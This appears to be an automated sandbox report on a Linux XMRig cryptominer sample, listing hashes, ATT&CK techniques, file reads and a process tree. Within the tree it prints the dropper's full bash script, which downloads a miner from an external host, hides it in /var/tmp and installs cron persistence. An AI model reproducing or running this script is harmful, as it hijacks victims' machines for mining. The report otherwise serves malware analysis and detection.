xmrig | afd21d61ab393e3ee1512b07010756c8718be56ab9fe9b0359127f1e6e306509

Analysis

max time kernel
149s
max time network
143s
platform
ubuntu-22.04_amd64
resource
ubuntu2204-amd64-20240611-en
resource tags

arch:amd64arch:i386image:ubuntu2204-amd64-20240611-enkernel:5.15.0-105-genericlocale:en-usos:ubuntu-22.04-amd64system
submitted
30-10-2024 10:32

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

.main.elf
Size

918KB
MD5

4567d8c6fc031d7e6ec7e05d7bf0875b
SHA1

136ed52d890bc49b5dc2792d8b20511b88c24f9c
SHA256

afd21d61ab393e3ee1512b07010756c8718be56ab9fe9b0359127f1e6e306509
SHA512

90bb019e9ea322d2d4972bf043bdc2b798b3b5c5d8d42c0641072db64dce2bbfd3d34b7ff6bbefe0d3aabbb3dd54e15e5262dca3065d87f7299f321a173d7d97
SSDEEP

12288:qfbx0BUBiCIT+yaXkeG2eNBRvlqoQfGO26dyynbikoYAw:qfbx0xCIT+xXkeGNNB33QR8kB1

Score

10^/10

xmrig xmrig_linux antivm defense_evasion discovery execution miner persistence privilege_escalatio

Malware Config

Signatures

XMRig Miner payload 2 IoCs

miner

Processes:

resource	yara_rule
/var/tmp/.rcu_gp/.report_system	family_xmrig
/var/tmp/.rcu_gp/.report_system	xmrig

Xmrig family
xmrig
Xmrig_linux family
xmrig_linux
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig_linux
File and Directory Permissions Modification 1 TTPs 3 IoCs
Adversaries may modify file or directory permissions to evade defenses.
defense_evasion

Linux and Mac File and Directory Permissions Modification
T1222.002

Processes:

bashchmodchmod

pid process

1571 bash
1584 chmod
1586 chmod

pid	process
1571	bash
1584	chmod
1586	chmod

Executes dropped EXE 57 IoCs

Processes:

diicot.report_systemdiicotdiicotdiicotdiicotdiicotdiicotdiicotdiicotdiicotdiicotdiicotdiicotdiicotdiicotdiicotdiicotdiicotdiicotdiicotdiicotdiicotdiicotdiicotdiicotdiicotdiicotdiicotdiicotdiicotdiicotdiicotdiicotdiicotdiicotdiicotdiicotdiicotdiicotdiicotdiicotdiicotdiicotdiicotdiicotdiicotdiicotdiicotdiicotdiicotdiicotdiicotdiicotdiicotdiicotdiicot

ioc	pid	process
/var/tmp/.rcu_gp/diicot	1597	diicot
/var/tmp/.rcu_gp/.report_system	1599	.report_system
/var/tmp/.rcu_gp/diicot	1611	diicot
/var/tmp/.rcu_gp/diicot	1617	diicot
/var/tmp/.rcu_gp/diicot	1623	diicot
/var/tmp/.rcu_gp/diicot	1629	diicot
/var/tmp/.rcu_gp/diicot	1635	diicot
/var/tmp/.rcu_gp/diicot	1641	diicot
/var/tmp/.rcu_gp/diicot	1647	diicot
/var/tmp/.rcu_gp/diicot	1653	diicot
/var/tmp/.rcu_gp/diicot	1661	diicot
/var/tmp/.rcu_gp/diicot	1667	diicot
/var/tmp/.rcu_gp/diicot	1673	diicot
/var/tmp/.rcu_gp/diicot	1679	diicot
/var/tmp/.rcu_gp/diicot	1685	diicot
/var/tmp/.rcu_gp/diicot	1691	diicot
/var/tmp/.rcu_gp/diicot	1697	diicot
/var/tmp/.rcu_gp/diicot	1703	diicot
/var/tmp/.rcu_gp/diicot	1709	diicot
/var/tmp/.rcu_gp/diicot	1715	diicot
/var/tmp/.rcu_gp/diicot	1721	diicot
/var/tmp/.rcu_gp/diicot	1727	diicot
/var/tmp/.rcu_gp/diicot	1733	diicot
/var/tmp/.rcu_gp/diicot	1739	diicot
/var/tmp/.rcu_gp/diicot	1745	diicot
/var/tmp/.rcu_gp/diicot	1751	diicot
/var/tmp/.rcu_gp/diicot	1757	diicot
/var/tmp/.rcu_gp/diicot	1763	diicot
/var/tmp/.rcu_gp/diicot	1769	diicot
/var/tmp/.rcu_gp/diicot	1775	diicot
/var/tmp/.rcu_gp/diicot	1781	diicot
/var/tmp/.rcu_gp/diicot	1787	diicot
/var/tmp/.rcu_gp/diicot	1793	diicot
/var/tmp/.rcu_gp/diicot	1799	diicot
/var/tmp/.rcu_gp/diicot	1805	diicot
/var/tmp/.rcu_gp/diicot	1811	diicot
/var/tmp/.rcu_gp/diicot	1817	diicot
/var/tmp/.rcu_gp/diicot	1823	diicot
/var/tmp/.rcu_gp/diicot	1829	diicot
/var/tmp/.rcu_gp/diicot	1835	diicot
/var/tmp/.rcu_gp/diicot	1841	diicot
/var/tmp/.rcu_gp/diicot	1847	diicot
/var/tmp/.rcu_gp/diicot	1853	diicot
/var/tmp/.rcu_gp/diicot	1859	diicot
/var/tmp/.rcu_gp/diicot	1865	diicot
/var/tmp/.rcu_gp/diicot	1874	diicot
/var/tmp/.rcu_gp/diicot	1880	diicot
/var/tmp/.rcu_gp/diicot	1886	diicot
/var/tmp/.rcu_gp/diicot	1892	diicot
/var/tmp/.rcu_gp/diicot	1898	diicot
/var/tmp/.rcu_gp/diicot	1904	diicot
/var/tmp/.rcu_gp/diicot	1910	diicot
/var/tmp/.rcu_gp/diicot	1916	diicot
/var/tmp/.rcu_gp/diicot	1922	diicot
/var/tmp/.rcu_gp/diicot	1928	diicot
/var/tmp/.rcu_gp/diicot	1934	diicot
/var/tmp/.rcu_gp/diicot	1940	diicot

Checks hardware identifiers (DMI) 1 TTPs 4 IoCs

Checks DMI information which indicate if the system is a virtual machine.

antivm

System Checks

T1497.001

Processes:

.report_system

description	ioc	process
File opened for reading	/sys/devices/virtual/dmi/id/board_vendor	.report_system
File opened for reading	/sys/devices/virtual/dmi/id/bios_vendor	.report_system
File opened for reading	/sys/devices/virtual/dmi/id/sys_vendor	.report_system
File opened for reading	/sys/devices/virtual/dmi/id/product_name	.report_system

Creates/modifies Cron job 1 TTPs 1 IoCs
Cron allows running tasks on a schedule, and is commonly used for malware persistence.
execution persistence privilege_escalatio

Cron
T1053.003

Processes:

crontab

description ioc process

File opened for modification /var/spool/cron/crontabs/tmp.SkkxPy crontab
Enumerates running processes
Discovers information about currently running processes on the system

description	ioc	process
File opened for modification	/var/spool/cron/crontabs/tmp.SkkxPy	crontab

Reads hardware information 1 TTPs 14 IoCs

Accesses system info like serial numbers, manufacturer names etc.

discovery

System Information Discovery

T1082

Processes:

.report_system

description	ioc	process
File opened for reading	/sys/devices/virtual/dmi/id/board_version	.report_system
File opened for reading	/sys/devices/virtual/dmi/id/product_serial	.report_system
File opened for reading	/sys/devices/virtual/dmi/id/product_uuid	.report_system
File opened for reading	/sys/devices/virtual/dmi/id/board_name	.report_system
File opened for reading	/sys/devices/virtual/dmi/id/chassis_version	.report_system
File opened for reading	/sys/devices/virtual/dmi/id/chassis_asset_tag	.report_system
File opened for reading	/sys/devices/virtual/dmi/id/product_version	.report_system
File opened for reading	/sys/devices/virtual/dmi/id/bios_version	.report_system
File opened for reading	/sys/devices/virtual/dmi/id/bios_date	.report_system
File opened for reading	/sys/devices/virtual/dmi/id/chassis_vendor	.report_system
File opened for reading	/sys/devices/virtual/dmi/id/board_asset_tag	.report_system
File opened for reading	/sys/devices/virtual/dmi/id/chassis_type	.report_system
File opened for reading	/sys/devices/virtual/dmi/id/chassis_serial	.report_system
File opened for reading	/sys/devices/virtual/dmi/id/board_serial	.report_system

Checks CPU configuration 1 TTPs 1 IoCs
Checks CPU information which indicate if the system is a virtual machine.
antivm

System Checks
T1497.001

Processes:

.report_system

description ioc process

File opened for reading /proc/cpuinfo .report_system

description	ioc	process
File opened for reading	/proc/cpuinfo	.report_system

Reads CPU attributes 1 TTPs 64 IoCs

discovery

System Information Discovery

T1082

Processes:

.report_systempgreppgreppgreppgreppgreppgreppgreppgreppgreppgreppgreppgreppgreppgreppgreppgreppgreppgreppgreppgreppgreppgreppgreppgreppgreppgreppgreppgreppgreppgreppgreppgreppgrep

description	ioc	process
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index2/coherency_line_size	.report_system
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index2/number_of_sets	.report_system
File opened for reading	/sys/devices/system/cpu/online	pgrep
File opened for reading	/sys/devices/system/cpu/online	pgrep
File opened for reading	/sys/devices/system/cpu/cpu0/topology/core_id	.report_system
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index0/id	.report_system
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index2/size	.report_system
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index4/shared_cpu_map	.report_system
File opened for reading	/sys/devices/system/cpu/online	pgrep
File opened for reading	/sys/devices/system/cpu/online	pgrep
File opened for reading	/sys/devices/system/cpu/online	pgrep
File opened for reading	/sys/devices/system/cpu/online	pgrep
File opened for reading	/sys/devices/system/cpu/online	pgrep
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index1/shared_cpu_map	.report_system
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index6/shared_cpu_map	.report_system
File opened for reading	/sys/devices/system/cpu/cpu0/cpufreq/base_frequency	.report_system
File opened for reading	/sys/devices/system/cpu/online	pgrep
File opened for reading	/sys/devices/system/cpu/online	pgrep
File opened for reading	/sys/devices/system/cpu/online	pgrep
File opened for reading	/sys/devices/system/cpu/online	pgrep
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index0/physical_line_partition	.report_system
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index2/physical_line_partition	.report_system
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index5/shared_cpu_map	.report_system
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index7/shared_cpu_map	.report_system
File opened for reading	/sys/devices/system/cpu/online	pgrep
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index0/shared_cpu_map	.report_system
File opened for reading	/sys/devices/system/cpu/online	pgrep
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index0/coherency_line_size	.report_system
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index3/shared_cpu_map	.report_system
File opened for reading	/sys/devices/system/cpu/possible	.report_system
File opened for reading	/sys/devices/system/cpu/online	pgrep
File opened for reading	/sys/devices/system/cpu/online	pgrep
File opened for reading	/sys/devices/system/cpu/online	pgrep
File opened for reading	/sys/devices/system/cpu/online	pgrep
File opened for reading	/sys/devices/system/cpu/cpu0/topology/physical_package_id	.report_system
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index1/level	.report_system
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index1/id	.report_system
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index3/size	.report_system
File opened for reading	/sys/devices/system/cpu/online	pgrep
File opened for reading	/sys/devices/system/cpu/online	pgrep
File opened for reading	/sys/devices/system/cpu/online	pgrep
File opened for reading	/sys/devices/system/cpu/online	pgrep
File opened for reading	/sys/devices/system/cpu/cpu0/topology/die_cpus	.report_system
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index0/number_of_sets	.report_system
File opened for reading	/sys/devices/system/cpu/online	pgrep
File opened for reading	/sys/devices/system/cpu/online	pgrep
File opened for reading	/sys/devices/system/cpu/online	pgrep
File opened for reading	/sys/devices/system/cpu/online	pgrep
File opened for reading	/sys/devices/system/cpu/online	pgrep
File opened for reading	/sys/devices/system/cpu/cpu0/topology/package_cpus	.report_system
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index0/size	.report_system
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index2/id	.report_system
File opened for reading	/sys/devices/system/cpu/cpu0/cpu_capacity	.report_system
File opened for reading	/sys/devices/system/cpu/online	pgrep
File opened for reading	/sys/devices/system/cpu/online	pgrep
File opened for reading	/sys/devices/system/cpu/online	pgrep
File opened for reading	/sys/devices/system/cpu/online	pgrep
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index0/level	.report_system
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index2/level	.report_system
File opened for reading	/sys/devices/system/cpu/online	pgrep
File opened for reading	/sys/devices/system/cpu/online	pgrep
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index1/type	.report_system
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index2/shared_cpu_map	.report_system
File opened for reading	/sys/devices/system/cpu/online	pgrep

Enumerates kernel/hardware configuration 1 TTPs 24 IoCs

Reads contents of /sys virtual filesystem to enumerate system information.

discovery

System Information Discovery

T1082

Processes:

.report_system

description	ioc	process
File opened for reading	/sys/devices/system/node/node0/hugepages/hugepages-1048576kB/nr_hugepages	.report_system
File opened for reading	/sys/devices/system/node/node0/access0/initiators/write_bandwidth	.report_system
File opened for reading	/sys/fs/cgroup/cgroup.controllers	.report_system
File opened for reading	/sys/kernel/mm/hugepages/hugepages-2048kB/nr_hugepages	.report_system
File opened for reading	/sys/kernel/mm/hugepages/hugepages-1048576kB/nr_hugepages	.report_system
File opened for reading	/sys/devices/system/node/online	.report_system
File opened for reading	/sys/devices/system/node/node0/meminfo	.report_system
File opened for reading	/sys/devices/system/node/node0/hugepages	.report_system
File opened for reading	/sys/devices/system/node/node0/access0/initiators/write_latency	.report_system
File opened for reading	/sys/devices/virtual/dmi/id	.report_system
File opened for reading	/sys/devices/system/node/node0/hugepages/hugepages-2048kB/free_hugepages	.report_system
File opened for reading	/sys/fs/cgroup/cpuset.mems.effective	.report_system
File opened for reading	/sys/kernel/mm/hugepages	.report_system
File opened for reading	/sys/devices/system/node/node0/cpumap	.report_system
File opened for reading	/sys/devices/system/node/node0/access1/initiators	.report_system
File opened for reading	/sys/devices/system/cpu	.report_system
File opened for reading	/sys/bus/dax/devices	.report_system
File opened for reading	/sys/firmware/dmi/tables/DMI	.report_system
File opened for reading	/sys/fs/cgroup/cpuset.cpus.effective	.report_system
File opened for reading	/sys/devices/system/node/node0/hugepages/hugepages-2048kB/nr_hugepages	.report_system
File opened for reading	/sys/devices/system/node/node0/access0/initiators	.report_system
File opened for reading	/sys/devices/system/node/node0/access0/initiators/read_bandwidth	.report_system
File opened for reading	/sys/devices/system/node/node0/access0/initiators/read_latency	.report_system
File opened for reading	/sys/firmware/dmi/tables/smbios_entry_point	.report_system

Reads runtime system information 64 IoCs

Reads data from /proc virtual filesystem.

discovery

Processes:

pgreppgreppgreppgreppgreppgreppgreppgreppgreppgreppgreppgreppgreppgreppgreppgreppgreppgreppgreppgreppgreppgreppgreppgreppgreppgreppgreppgreppgreppgreppgreppgreppgreppgreppgreppgreppgrep

description	ioc	process
File opened for reading	/proc/699/status	pgrep
File opened for reading	/proc/1166/cmdline	pgrep
File opened for reading	/proc/540/status	pgrep
File opened for reading	/proc/206/cmdline	pgrep
File opened for reading	/proc/95/cmdline	pgrep
File opened for reading	/proc/824/cmdline	pgrep
File opened for reading	/proc/1163/status	pgrep
File opened for reading	/proc/1107/status	pgrep
File opened for reading	/proc/1078/cmdline	pgrep
File opened for reading	/proc/99/status	pgrep
File opened for reading	/proc/1387/cmdline	pgrep
File opened for reading	/proc/89/status	pgrep
File opened for reading	/proc/95/status	pgrep
File opened for reading	/proc/1160/status	pgrep
File opened for reading	/proc/667/cmdline	pgrep
File opened for reading	/proc/86/status	pgrep
File opened for reading	/proc/1559/status	pgrep
File opened for reading	/proc/82/status	pgrep
File opened for reading	/proc/83/status	pgrep
File opened for reading	/proc/1246/status	pgrep
File opened for reading	/proc/86/cmdline	pgrep
File opened for reading	/proc/731/cmdline	pgrep
File opened for reading	/proc/1/cmdline	pgrep
File opened for reading	/proc/588/status	pgrep
File opened for reading	/proc/8/cmdline	pgrep
File opened for reading	/proc/162/status	pgrep
File opened for reading	/proc/1453/cmdline	pgrep
File opened for reading	/proc/1165/status	pgrep
File opened for reading	/proc/1113/status	pgrep
File opened for reading	/proc/1078/status	pgrep
File opened for reading	/proc/1177/status	pgrep
File opened for reading	/proc/79/cmdline	pgrep
File opened for reading	/proc/27/cmdline	pgrep
File opened for reading	/proc/657/cmdline	pgrep
File opened for reading	/proc/212/cmdline	pgrep
File opened for reading	/proc/10/status	pgrep
File opened for reading	/proc/5/cmdline	pgrep
File opened for reading	/proc/86/status	pgrep
File opened for reading	/proc/22/cmdline	pgrep
File opened for reading	/proc/102/status	pgrep
File opened for reading	/proc/1145/cmdline	pgrep
File opened for reading	/proc/19/status	pgrep
File opened for reading	/proc/208/cmdline	pgrep
File opened for reading	/proc/871/status	pgrep
File opened for reading	/proc/225/cmdline	pgrep
File opened for reading	/proc/1571/status	pgrep
File opened for reading	/proc/222/cmdline	pgrep
File opened for reading	/proc/22/status	pgrep
File opened for reading	/proc/83/cmdline	pgrep
File opened for reading	/proc/3/cmdline	pgrep
File opened for reading	/proc/11/cmdline	pgrep
File opened for reading	/proc/630/status	pgrep
File opened for reading	/proc/871/status	pgrep
File opened for reading	/proc/77/status	pgrep
File opened for reading	/proc/86/cmdline	pgrep
File opened for reading	/proc/1057/status	pgrep
File opened for reading	/proc/589/status	pgrep
File opened for reading	/proc/223/status	pgrep
File opened for reading	/proc/726/cmdline	pgrep
File opened for reading	/proc/2/status	pgrep
File opened for reading	/proc/1440/status	pgrep
File opened for reading	/proc/587/cmdline	pgrep
File opened for reading	/proc/376/status	pgrep
File opened for reading	/proc/8/cmdline	pgrep

/tmp/.main.elf
/tmp/.main.elf
1⤵
PID:1571

/bin/bash
/tmp/.main.elf -c "exec '/tmp/.main.elf' \"\$@\"" /tmp/.main.elf
1⤵
PID:1571

/tmp/.main.elf
/tmp/.main.elf
1⤵
PID:1571

/bin/bash
/tmp/.main.elf -c " #!/bin/bash RCU_GP_DIR=\"/var/tmp/.rcu_gp\" REPORT_SYSTEM_URL=\"http://xkobeimparatu.net/.puscarie/.report_system\" DIICOT_FILE=\"diicot\" setup_report_system() { if [ ! -d \"\$RCU_GP_DIR\" ]; then mkdir \"\$RCU_GP_DIR\" fi cd \"\$RCU_GP_DIR\" || exit if command -v wget &> /dev/null; then wget \"\$REPORT_SYSTEM_URL\" -O .report_system elif command -v curl &> /dev/null; then curl -o .report_system \"\$REPORT_SYSTEM_URL\" else echo \"Nu s-a gasit nici wget, nici curl\" exit 1 fi chmod +x .report_system cd - || exit } create_diicot_file() { DIICOT_PATH=\"\$RCU_GP_DIR/\$DIICOT_FILE\" cat <<EOL > \"\$DIICOT_PATH\" #!/bin/bash if ! pgrep -x .report_system >/dev/null; then /var/tmp/.rcu_gp/./.report_system> /dev/null 2>&1 & disown \$* else : fi EOL chmod +x \"\$DIICOT_PATH\" } setup_cron_jobs() { locatie=\"\$RCU_GP_DIR\" locatie2=\"\$PWD\" if [ ! -f \"\$locatie/.ps4\" ]; then echo \"\$locatie\" > \"\$locatie/.ps4\" fi if ! crontab -l | grep -q '.main'; then rm -rf \"\$locatie/.ps5\" echo \"@daily \$locatie/\$DIICOT_FILE\" >> \"\$locatie/.ps5\" sleep 1 echo \"@reboot \$locatie2/.main > /dev/null 2>&1 & disown\" >> \"\$locatie/.ps5\" sleep 1 echo \"@monthly \$locatie2/.main > /dev/null 2>&1 & disown\" >> \"\$locatie/.ps5\" sleep 1 crontab \"\$locatie/.ps5\" sleep 1 rm -rf \"\$locatie/.ps5\" fi } setup_report_system create_diicot_file setup_cron_jobs while : do \$(cat /var/tmp/.rcu_gp/.ps4)/diicot setup_cron_jobs sleep 2.5 done echo \"Merge bn mineru serifule\" " /tmp/.main.elf
1⤵
- File and Directory Permissions Modification
PID:1571
- /usr/bin/mkdir
  mkdir /var/tmp/.rcu_gp
  2⤵
  PID:1572
- /usr/bin/wget
  wget http://xkobeimparatu.net/.puscarie/.report_system -O .report_system
  2⤵
  PID:1573
- /usr/bin/chmod
  chmod +x .report_system
  2⤵
  - File and Directory Permissions Modification
  PID:1584
- /usr/bin/cat
  cat
  2⤵
  PID:1585
- /usr/bin/chmod
  chmod +x /var/tmp/.rcu_gp/diicot
  2⤵
  - File and Directory Permissions Modification
  PID:1586
- /usr/bin/grep
  grep -q .main
  2⤵
  PID:1588
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:1587
- /usr/bin/rm
  rm -rf /var/tmp/.rcu_gp/.ps5
  2⤵
  PID:1589
- /usr/bin/sleep
  sleep 1
  2⤵
  PID:1590
- /usr/bin/sleep
  sleep 1
  2⤵
  PID:1591
- /usr/bin/sleep
  sleep 1
  2⤵
  PID:1592
- /usr/bin/crontab
  crontab /var/tmp/.rcu_gp/.ps5
  2⤵
  - Creates/modifies Cron job
  PID:1593
- /usr/bin/sleep
  sleep 1
  2⤵
  PID:1594
- /usr/bin/rm
  rm -rf /var/tmp/.rcu_gp/.ps5
  2⤵
  PID:1595
- /usr/bin/cat
  cat /var/tmp/.rcu_gp/.ps4
  2⤵
  PID:1596
- /var/tmp/.rcu_gp/diicot
  /var/tmp/.rcu_gp/diicot
  2⤵
  - Executes dropped EXE
  PID:1597
- - /usr/bin/pgrep
    pgrep -x .report_system
    3⤵
    - Reads CPU attributes
    PID:1598
- /usr/bin/grep
  grep -q .main
  2⤵
  PID:1601
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:1600
- /usr/bin/sleep
  sleep 2.5
  2⤵
  PID:1602
- /usr/bin/cat
  cat /var/tmp/.rcu_gp/.ps4
  2⤵
  PID:1610
- /var/tmp/.rcu_gp/diicot
  /var/tmp/.rcu_gp/diicot
  2⤵
  - Executes dropped EXE
  PID:1611
- - /usr/bin/pgrep
    pgrep -x .report_system
    3⤵
    - Reads CPU attributes
    - Reads runtime system information
    PID:1612
- /usr/bin/grep
  grep -q .main
  2⤵
  PID:1614
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:1613
- /usr/bin/sleep
  sleep 2.5
  2⤵
  PID:1615
- /usr/bin/cat
  cat /var/tmp/.rcu_gp/.ps4
  2⤵
  PID:1616
- /var/tmp/.rcu_gp/diicot
  /var/tmp/.rcu_gp/diicot
  2⤵
  - Executes dropped EXE
  PID:1617
- - /usr/bin/pgrep
    pgrep -x .report_system
    3⤵
    - Reads CPU attributes
    - Reads runtime system information
    PID:1618
- /usr/bin/grep
  grep -q .main
  2⤵
  PID:1620
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:1619
- /usr/bin/sleep
  sleep 2.5
  2⤵
  PID:1621
- /usr/bin/cat
  cat /var/tmp/.rcu_gp/.ps4
  2⤵
  PID:1622
- /var/tmp/.rcu_gp/diicot
  /var/tmp/.rcu_gp/diicot
  2⤵
  - Executes dropped EXE
  PID:1623
- - /usr/bin/pgrep
    pgrep -x .report_system
    3⤵
    - Reads CPU attributes
    - Reads runtime system information
    PID:1624
- /usr/bin/grep
  grep -q .main
  2⤵
  PID:1626
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:1625
- /usr/bin/sleep
  sleep 2.5
  2⤵
  PID:1627
- /usr/bin/cat
  cat /var/tmp/.rcu_gp/.ps4
  2⤵
  PID:1628
- /var/tmp/.rcu_gp/diicot
  /var/tmp/.rcu_gp/diicot
  2⤵
  - Executes dropped EXE
  PID:1629
- - /usr/bin/pgrep
    pgrep -x .report_system
    3⤵
    - Reads runtime system information
    PID:1630
- /usr/bin/grep
  grep -q .main
  2⤵
  PID:1632
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:1631
- /usr/bin/sleep
  sleep 2.5
  2⤵
  PID:1633
- /usr/bin/cat
  cat /var/tmp/.rcu_gp/.ps4
  2⤵
  PID:1634
- /var/tmp/.rcu_gp/diicot
  /var/tmp/.rcu_gp/diicot
  2⤵
  - Executes dropped EXE
  PID:1635
- - /usr/bin/pgrep
    pgrep -x .report_system
    3⤵
    - Reads CPU attributes
    PID:1636
- /usr/bin/grep
  grep -q .main
  2⤵
  PID:1638
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:1637
- /usr/bin/sleep
  sleep 2.5
  2⤵
  PID:1639
- /usr/bin/cat
  cat /var/tmp/.rcu_gp/.ps4
  2⤵
  PID:1640
- /var/tmp/.rcu_gp/diicot
  /var/tmp/.rcu_gp/diicot
  2⤵
  - Executes dropped EXE
  PID:1641
- - /usr/bin/pgrep
    pgrep -x .report_system
    3⤵
    - Reads runtime system information
    PID:1642
- /usr/bin/grep
  grep -q .main
  2⤵
  PID:1644
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:1643
- /usr/bin/sleep
  sleep 2.5
  2⤵
  PID:1645
- /usr/bin/cat
  cat /var/tmp/.rcu_gp/.ps4
  2⤵
  PID:1646
- /var/tmp/.rcu_gp/diicot
  /var/tmp/.rcu_gp/diicot
  2⤵
  - Executes dropped EXE
  PID:1647
- - /usr/bin/pgrep
    pgrep -x .report_system
    3⤵
    PID:1648
- /usr/bin/grep
  grep -q .main
  2⤵
  PID:1650
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:1649
- /usr/bin/sleep
  sleep 2.5
  2⤵
  PID:1651
- /usr/bin/cat
  cat /var/tmp/.rcu_gp/.ps4
  2⤵
  PID:1652
- /var/tmp/.rcu_gp/diicot
  /var/tmp/.rcu_gp/diicot
  2⤵
  - Executes dropped EXE
  PID:1653
- - /usr/bin/pgrep
    pgrep -x .report_system
    3⤵
    PID:1654
- /usr/bin/grep
  grep -q .main
  2⤵
  PID:1656
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:1655
- /usr/bin/sleep
  sleep 2.5
  2⤵
  PID:1657
- /usr/bin/cat
  cat /var/tmp/.rcu_gp/.ps4
  2⤵
  PID:1660
- /var/tmp/.rcu_gp/diicot
  /var/tmp/.rcu_gp/diicot
  2⤵
  - Executes dropped EXE
  PID:1661
- - /usr/bin/pgrep
    pgrep -x .report_system
    3⤵
    - Reads CPU attributes
    - Reads runtime system information
    PID:1662
- /usr/bin/grep
  grep -q .main
  2⤵
  PID:1664
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:1663
- /usr/bin/sleep
  sleep 2.5
  2⤵
  PID:1665
- /usr/bin/cat
  cat /var/tmp/.rcu_gp/.ps4
  2⤵
  PID:1666
- /var/tmp/.rcu_gp/diicot
  /var/tmp/.rcu_gp/diicot
  2⤵
  - Executes dropped EXE
  PID:1667
- - /usr/bin/pgrep
    pgrep -x .report_system
    3⤵
    - Reads CPU attributes
    PID:1668
- /usr/bin/grep
  grep -q .main
  2⤵
  PID:1670
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:1669
- /usr/bin/sleep
  sleep 2.5
  2⤵
  PID:1671
- /usr/bin/cat
  cat /var/tmp/.rcu_gp/.ps4
  2⤵
  PID:1672
- /var/tmp/.rcu_gp/diicot
  /var/tmp/.rcu_gp/diicot
  2⤵
  - Executes dropped EXE
  PID:1673
- - /usr/bin/pgrep
    pgrep -x .report_system
    3⤵
    - Reads CPU attributes
    - Reads runtime system information
    PID:1674
- /usr/bin/grep
  grep -q .main
  2⤵
  PID:1676
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:1675
- /usr/bin/sleep
  sleep 2.5
  2⤵
  PID:1677
- /usr/bin/cat
  cat /var/tmp/.rcu_gp/.ps4
  2⤵
  PID:1678
- /var/tmp/.rcu_gp/diicot
  /var/tmp/.rcu_gp/diicot
  2⤵
  - Executes dropped EXE
  PID:1679
- - /usr/bin/pgrep
    pgrep -x .report_system
    3⤵
    PID:1680
- /usr/bin/grep
  grep -q .main
  2⤵
  PID:1682
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:1681
- /usr/bin/sleep
  sleep 2.5
  2⤵
  PID:1683
- /usr/bin/cat
  cat /var/tmp/.rcu_gp/.ps4
  2⤵
  PID:1684
- /var/tmp/.rcu_gp/diicot
  /var/tmp/.rcu_gp/diicot
  2⤵
  - Executes dropped EXE
  PID:1685
- - /usr/bin/pgrep
    pgrep -x .report_system
    3⤵
    - Reads CPU attributes
    PID:1686
- /usr/bin/grep
  grep -q .main
  2⤵
  PID:1688
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:1687
- /usr/bin/sleep
  sleep 2.5
  2⤵
  PID:1689
- /usr/bin/cat
  cat /var/tmp/.rcu_gp/.ps4
  2⤵
  PID:1690
- /var/tmp/.rcu_gp/diicot
  /var/tmp/.rcu_gp/diicot
  2⤵
  - Executes dropped EXE
  PID:1691
- - /usr/bin/pgrep
    pgrep -x .report_system
    3⤵
    - Reads runtime system information
    PID:1692
- /usr/bin/grep
  grep -q .main
  2⤵
  PID:1694
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:1693
- /usr/bin/sleep
  sleep 2.5
  2⤵
  PID:1695
- /usr/bin/cat
  cat /var/tmp/.rcu_gp/.ps4
  2⤵
  PID:1696
- /var/tmp/.rcu_gp/diicot
  /var/tmp/.rcu_gp/diicot
  2⤵
  - Executes dropped EXE
  PID:1697
- - /usr/bin/pgrep
    pgrep -x .report_system
    3⤵
    - Reads runtime system information
    PID:1698
- /usr/bin/grep
  grep -q .main
  2⤵
  PID:1700
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:1699
- /usr/bin/sleep
  sleep 2.5
  2⤵
  PID:1701
- /usr/bin/cat
  cat /var/tmp/.rcu_gp/.ps4
  2⤵
  PID:1702
- /var/tmp/.rcu_gp/diicot
  /var/tmp/.rcu_gp/diicot
  2⤵
  - Executes dropped EXE
  PID:1703
- - /usr/bin/pgrep
    pgrep -x .report_system
    3⤵
    PID:1704
- /usr/bin/grep
  grep -q .main
  2⤵
  PID:1706
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:1705
- /usr/bin/sleep
  sleep 2.5
  2⤵
  PID:1707
- /usr/bin/cat
  cat /var/tmp/.rcu_gp/.ps4
  2⤵
  PID:1708
- /var/tmp/.rcu_gp/diicot
  /var/tmp/.rcu_gp/diicot
  2⤵
  - Executes dropped EXE
  PID:1709
- - /usr/bin/pgrep
    pgrep -x .report_system
    3⤵
    - Reads CPU attributes
    - Reads runtime system information
    PID:1710
- /usr/bin/grep
  grep -q .main
  2⤵
  PID:1712
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:1711
- /usr/bin/sleep
  sleep 2.5
  2⤵
  PID:1713
- /usr/bin/cat
